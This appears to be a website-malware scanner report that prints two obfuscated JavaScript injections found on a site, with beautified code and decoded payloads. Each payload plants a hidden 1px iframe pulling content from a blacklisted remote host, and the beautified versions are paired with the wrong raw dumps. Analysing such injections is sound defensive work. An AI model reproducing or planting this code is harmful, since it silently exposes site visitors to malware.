Injected JavaScript code generates malicious iframes
Background
Online Website Malware Scanner has identified a malicious JavaScript code injection inside the scanned website. The iframe leads to a blacklisted website. Such obfuscated JavaScript is used to build a malicious iframe that is invisible to the website user and downloads content from a remote malware distributor; in both samples below the iframe is absolutely positioned and sized 1px by 1px, so the visitor sees nothing while the browser loads the remote page. The infected website hosts suspicious JavaScript code injected into 13 files. As discussed in other posts about malicious iframe generation, the attack flow is very similar and usually involves one or more levels of obfuscation to evade detection mechanisms: here each sample stores the dropper as a numeric array, rebuilds it with String.fromCharCode in a loop, and executes it through eval looked up as a property of window. The site contains two malicious iframes, each pointing to a different URL.
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources (websites).
Website malware scan report
Submission date: Fri Apr 5 07:31:49 2013
Infected website files: 13
Website malware scan report: http://goo.gl/INLoi
Malware entry details
Threat dump no.1:
[[ asgq=[0x28,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x28,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x76,0x61,0x72,0x20,0x75,0x69,0x71,0x71,0x63,0x20,0x3d,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x63,0x72,0x65,0x61,0x74,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x28,0x27,0x69,0x66,0x72,0x61,0x6d,0x65,0x27,0x29,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x72,0x63,0x20,0x3d,0x20,0x27,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x70,0x6c,0x61,0x79,0x6c,0x69,0x6f,0x6e,0x2e,0x74,0x6b,0x2f,0x64,0x74,0x64,0x2e,0x70,0x68,0x70,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x70,0x6f,0x73,0x69,0x74,0x69,0x6f,0x6e,0x20,0x3d,0x20,0x27,0x61,0x62,0x73,0x6f,0x6c,0x75,0x74,0x65,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x62,0x6f,0x72,0x64,0x65,0x72,0x20,0x3d,0x20,0x27,0x30,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x68,0x65,0x69,0x67,0x68,0x74,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x77,0x69,0x64,0x74,0x68,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x6c,0x65,0x66,0x74,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x74,0x6f,0x70,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x69,0x66,0x20,0x28,0x21,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x67,0x65,0x74,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x42,0x79,0x49,0x64,0x28,0x27,0x75,0x69,0x71,0x71,0x63,0x27,0x29,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x77,0x72,0x69,0x74,0x65,0x28,0x27,0x3c,0x64,0x69,0x76,0x20,0x69,0x64,0x3d,0x5c,0x27,0x75,0x69,0x71,0x71,0x63,0x5c,0x27,0x3e,
0x3c,0x2f,0x64,0x69,0x76,0x3e,0x27,0x29,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x67,0x65,0x74,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x42,0x79,0x49,0x64,0x28,0x27,0x75,0x69,0x71,0x71,0x63,0x27,0x29,0x2e,0x61,0x70,0x70,0x65,0x6e,0x64,0x43,0x68,0x69,0x6c,0x64,0x28,0x75,0x69,0x71,0x71,0x63,0x29,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x7d,0xd,0xa,0x7d,0x29,0x28,0x29,0x3b];try{document.body|=1}catch(gdsgsdg){zz=3;dbshre=110;if(dbshre){vfvwe=0;try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["eval"];}s="";for(i=0;i-488!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}z=s;e(s);}}]]
Beautified malicious script
- <script>
- ff = String;
- fff = "fromCharCode";
- ff = ff[fff];
- zz = 3;
- try {
- document.body % 26 = 5151
- } catch (gdsgd) {
- v = "eval";
- if (document) try {
- document.body = 12;
- } catch (gdsgsdg) {
- asd = 0;
- try {
- document;
- } catch (q) {
- asd = 1;
- }
- }
- if (!asd) e = window[v];
- if (1) {
- f = new Array(050, 0146, 0165, 0156, 0143, 0164, 0151, 0157, 0156, 040, 050, 051, 040, 0173, 015, 012,040, 040, 040, 040, 0166, 0141, 0162, 040, 0163, 0143, 0171, 0171, 0144, 040, 075, 040, 0144, 0157, 0143, 0165,0155, 0145, 0156, 0164, 056, 0143, 0162, 0145, 0141, 0164, 0145, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 050,047, 0151, 0146, 0162, 0141, 0155, 0145, 047, 051, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0163, 0143, 0171,0171, 0144, 056, 0163, 0162, 0143, 040, 075, 040, 047, 0150, 0164, 0164, 0160, 072, 057, 057, 0166, 0151, 0163,0155, 0141, 0151, 0157, 0162, 056, 0157, 061, 062, 056, 0160, 0154, 057, 0141, 0144, 0155, 0151, 0156, 0151, 0163,0164, 0162, 0141, 0164, 0157, 0162, 057, 0145, 0163, 0144, 056, 0160, 0150, 0160, 047, 073, 015, 012, 040, 040,040, 040, 0163, 0143, 0171, 0171, 0144, 056, 0163, 0164, 0171, 0154, 0145, 056, 0160, 0157, 0163, 0151, 0164,0151, 0157, 0156, 040, 075, 040, 047, 0141, 0142, 0163, 0157, 0154, 0165, 0164, 0145, 047, 073, 015, 012, 040,040, 040, 040, 0163, 0143, 0171, 0171, 0144, 056, 0163, 0164, 0171, 0154, 0145, 056, 0142, 0157, 0162, 0144, 0145,0162, 040, 075, 040, 047, 060, 047, 073, 015, 012, 040, 040, 040, 040, 0163, 0143, 0171, 0171, 0144, 056, 0163,0164, 0171, 0154, 0145, 056, 0150, 0145, 0151, 0147, 0150, 0164, 040, 075, 040, 047, 061, 0160, 0170, 047, 073,015, 012, 040, 040, 040, 040, 0163, 0143, 0171, 0171, 0144, 056, 0163, 0164, 0171, 0154, 0145, 056, 0167, 0151,0144, 0164, 0150, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0163, 0143, 0171,0171, 0144, 056, 0163, 0164, 0171, 0154, 0145, 056, 0154, 0145, 0146, 0164, 040, 075, 040, 047, 061, 0160, 0170,047, 073, 015, 012, 040, 040, 040, 040, 0163, 0143, 0171, 0171, 0144, 056, 0163, 0164, 0171, 0154, 0145, 056,0164, 0157, 0160, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0151,0146, 040, 050, 041, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145,0155, 
0145, 0156, 0164, 0102, 0171, 0111, 0144, 050, 047, 0163, 0143, 0171, 0171, 0144, 047, 051, 051, 040, 0173,015, 012, 040, 040, 040, 040, 040, 040, 040, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0167, 0162,0151, 0164, 0145, 050, 047, 074, 0144, 0151, 0166, 040, 0151, 0144, 075, 0134, 047, 0163, 0143, 0171, 0171, 0144,0134, 047, 076, 074, 057, 0144, 0151, 0166, 076, 047, 051, 073, 015, 012, 040, 040, 040, 040, 040, 040, 040, 040,0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145, 0155, 0145, 0156, 0164,0102, 0171, 0111, 0144, 050, 047, 0163, 0143, 0171, 0171, 0144, 047, 051, 056, 0141, 0160, 0160, 0145, 0156, 0144,0103, 0150, 0151, 0154, 0144, 050, 0163, 0143, 0171, 0171, 0144, 051, 073, 015, 012, 040, 040, 040, 040, 0175,015, 012, 0175, 051, 050, 051, 073);
- }
- w = f;
- s = [];
- if (window.document) for (i = 2 - 2; - i + 506 != 0; i += 1) {
- j = i;
- if ((031 == 0x19)) if (e) s = s + ff(w[j]);
- }
- xz = e;
- if (window.document) if (v) xz(s)
- }
- </script>
Simplified version of the threat
- <script>
- f = new Array(050, 0146, 0165, 0156, 0143, 0164, 0151, 0157, 0156, 040, 050, 051, 040, 0173, 015, 012, 040, 040,040, 040, 0166, 0141, 0162, 040, 016 ....
- s = "";
- for (i = 2 - 2; - i + 506 != 0; i += 1) { s = s + String.fromCharCode(f[i]); }
- eval(s);
- </script>
Malicious payload
decoded payload generates a hidden iframe pointing to the malicious URL http://vismaior[.]o12[.]pl/administrator/esd.php
- (function () {
- var scyyd = document.createElement('iframe');
- scyyd.src = 'http://vismaior[.]o12[.]pl/administrator/esd.php';
- scyyd.style.position = 'absolute';
- scyyd.style.border = '0';
- scyyd.style.height = '1px';
- scyyd.style.width = '1px';
- scyyd.style.left = '1px';
- scyyd.style.top = '1px';
- if (!document.getElementById('scyyd')) {
- document.write('<div id=\'scyyd\'></div>');
- document.getElementById('scyyd').appendChild(scyyd);
- }
- })();
Threat dump no.2:
[[ ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body%26=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0163,0143,0171,0171,0144,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0166,0151,0163,0155,0141,0151,0157,0162,056,0157,061,062,056,0160,0154,057,0141,0144,0155,0151,0156,0151,0163,0164,0162,0141,0164,0157,0162,057,0145,0163,0144,056,0160,0150,0160,047,073,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0163,0143,0171,0171,0144,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,015
7,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0163,0143,0171,0171,0144,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0163,0143,0171,0171,0144,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0163,0143,0171,0171,0144,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+506!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(window.document)if(v)xz(s)}]]
Beautified malicious script
- asgq = [0x28, 0x66, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x28, 0x29, 0x20, 0x7b, 0xd, 0xa, 0x20, 0x20,0x20, 0x20, 0x76, 0x61, 0x72, 0x20, 0x75, 0x69, 0x71, 0x71, 0x63, 0x20, 0x3d, 0x20, 0x64, 0x6f, 0x63, 0x75, 0x6d,0x65, 0x6e, 0x74, 0x2e, 0x63, 0x72, 0x65, 0x61, 0x74, 0x65, 0x45, 0x6c, 0x65, 0x6d, 0x65, 0x6e, 0x74, 0x28, 0x27,0x69, 0x66, 0x72, 0x61, 0x6d, 0x65, 0x27, 0x29, 0x3b, 0xd, 0xa, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69,0x71, 0x71, 0x63, 0x2e, 0x73, 0x72, 0x63, 0x20, 0x3d, 0x20, 0x27, 0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f, 0x70,0x6c, 0x61, 0x79, 0x6c, 0x69, 0x6f, 0x6e, 0x2e, 0x74, 0x6b, 0x2f, 0x64, 0x74, 0x64, 0x2e, 0x70, 0x68, 0x70, 0x27,0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x71, 0x71, 0x63, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e,0x70, 0x6f, 0x73, 0x69, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x3d, 0x20, 0x27, 0x61, 0x62, 0x73, 0x6f, 0x6c, 0x75, 0x74,0x65, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x71, 0x71, 0x63, 0x2e, 0x73, 0x74, 0x79, 0x6c,0x65, 0x2e, 0x62, 0x6f, 0x72, 0x64, 0x65, 0x72, 0x20, 0x3d, 0x20, 0x27, 0x30, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20,0x20, 0x20, 0x75, 0x69, 0x71, 0x71, 0x63, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e, 0x68, 0x65, 0x69, 0x67, 0x68,0x74, 0x20, 0x3d, 0x20, 0x27, 0x31, 0x70, 0x78, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x71,0x71, 0x63, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e, 0x77, 0x69, 0x64, 0x74, 0x68, 0x20, 0x3d, 0x20, 0x27, 0x31,0x70, 0x78, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x71, 0x71, 0x63, 0x2e, 0x73, 0x74, 0x79,0x6c, 0x65, 0x2e, 0x6c, 0x65, 0x66, 0x74, 0x20, 0x3d, 0x20, 0x27, 0x31, 0x70, 0x78, 0x27, 0x3b, 0xd, 0xa, 0x20,0x20, 0x20, 0x20, 0x75, 0x69, 0x71, 0x71, 0x63, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e, 0x74, 0x6f, 0x70, 0x20,0x3d, 0x20, 0x27, 0x31, 0x70, 0x78, 0x27, 0x3b, 0xd, 0xa, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x69, 0x66, 0x20,0x28, 0x21, 0x64, 0x6f, 0x63, 0x75, 0x6d, 0x65, 0x6e, 0x74, 0x2e, 0x67, 0x65, 0x74, 0x45, 0x6c, 
0x65, 0x6d, 0x65,0x6e, 0x74, 0x42, 0x79, 0x49, 0x64, 0x28, 0x27, 0x75, 0x69, 0x71, 0x71, 0x63, 0x27, 0x29, 0x29, 0x20, 0x7b, 0xd,0xa, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x64, 0x6f, 0x63, 0x75, 0x6d, 0x65, 0x6e, 0x74, 0x2e, 0x77,0x72, 0x69, 0x74, 0x65, 0x28, 0x27, 0x3c, 0x64, 0x69, 0x76, 0x20, 0x69, 0x64, 0x3d, 0x5c, 0x27, 0x75, 0x69, 0x71,0x71, 0x63, 0x5c, 0x27, 0x3e, 0x3c, 0x2f, 0x64, 0x69, 0x76, 0x3e, 0x27, 0x29, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20,0x20, 0x20, 0x20, 0x20, 0x20, 0x64, 0x6f, 0x63, 0x75, 0x6d, 0x65, 0x6e, 0x74, 0x2e, 0x67, 0x65, 0x74, 0x45, 0x6c,0x65, 0x6d, 0x65, 0x6e, 0x74, 0x42, 0x79, 0x49, 0x64, 0x28, 0x27, 0x75, 0x69, 0x71, 0x71, 0x63, 0x27, 0x29, 0x2e,0x61, 0x70, 0x70, 0x65, 0x6e, 0x64, 0x43, 0x68, 0x69, 0x6c, 0x64, 0x28, 0x75, 0x69, 0x71, 0x71, 0x63, 0x29, 0x3b,0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x7d, 0xd, 0xa, 0x7d, 0x29, 0x28, 0x29, 0x3b];
- try {
- document.body |= 1
- } catch (gdsgsdg) {
- zz = 3;
- dbshre = 110;
- if (dbshre) {
- vfvwe = 0;
- try {} catch (agdsg) {
- vfvwe = 1;
- }
- if (!vfvwe) {
- e = window["eval"];
- }
- s = "";
- for (i = 0; i - 488 != 0; i++) {
- if (window.document) s += String.fromCharCode(asgq[i]);
- }
- z = s;
- e(s);
- }
- }
Simplified version of the threat
- asgq = [0x28, 0x66, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x28, 0x29, 0x20, 0x7b, 0xd, 0xa, 0x20, 0x20,0x20, 0x20, 0x76, 0x61, 0x72, 0x20, 0x...
- s = "";
- for (i = 0; i - 488 != 0; i++) { s += String.fromCharCode(asgq[i]); }
- eval(s);
Malicious payload
decoded payload generates a hidden iframe pointing to the malicious URL http://playlion[.]tk/dtd[.]php
- (function () {
- var uiqqc = document.createElement('iframe');
- uiqqc.src = 'http://playlion.tk/dtd.php';
- uiqqc.style.position = 'absolute';
- uiqqc.style.border = '0';
- uiqqc.style.height = '1px';
- uiqqc.style.width = '1px';
- uiqqc.style.left = '1px';
- uiqqc.style.top = '1px';
- if (!document.getElementById('uiqqc')) {
- document.write('<div id=\'uiqqc\'></div>');
- document.getElementById('uiqqc').appendChild(uiqqc);
- }
- })();
Blacklisting status
Google Safe Browsing diagnostic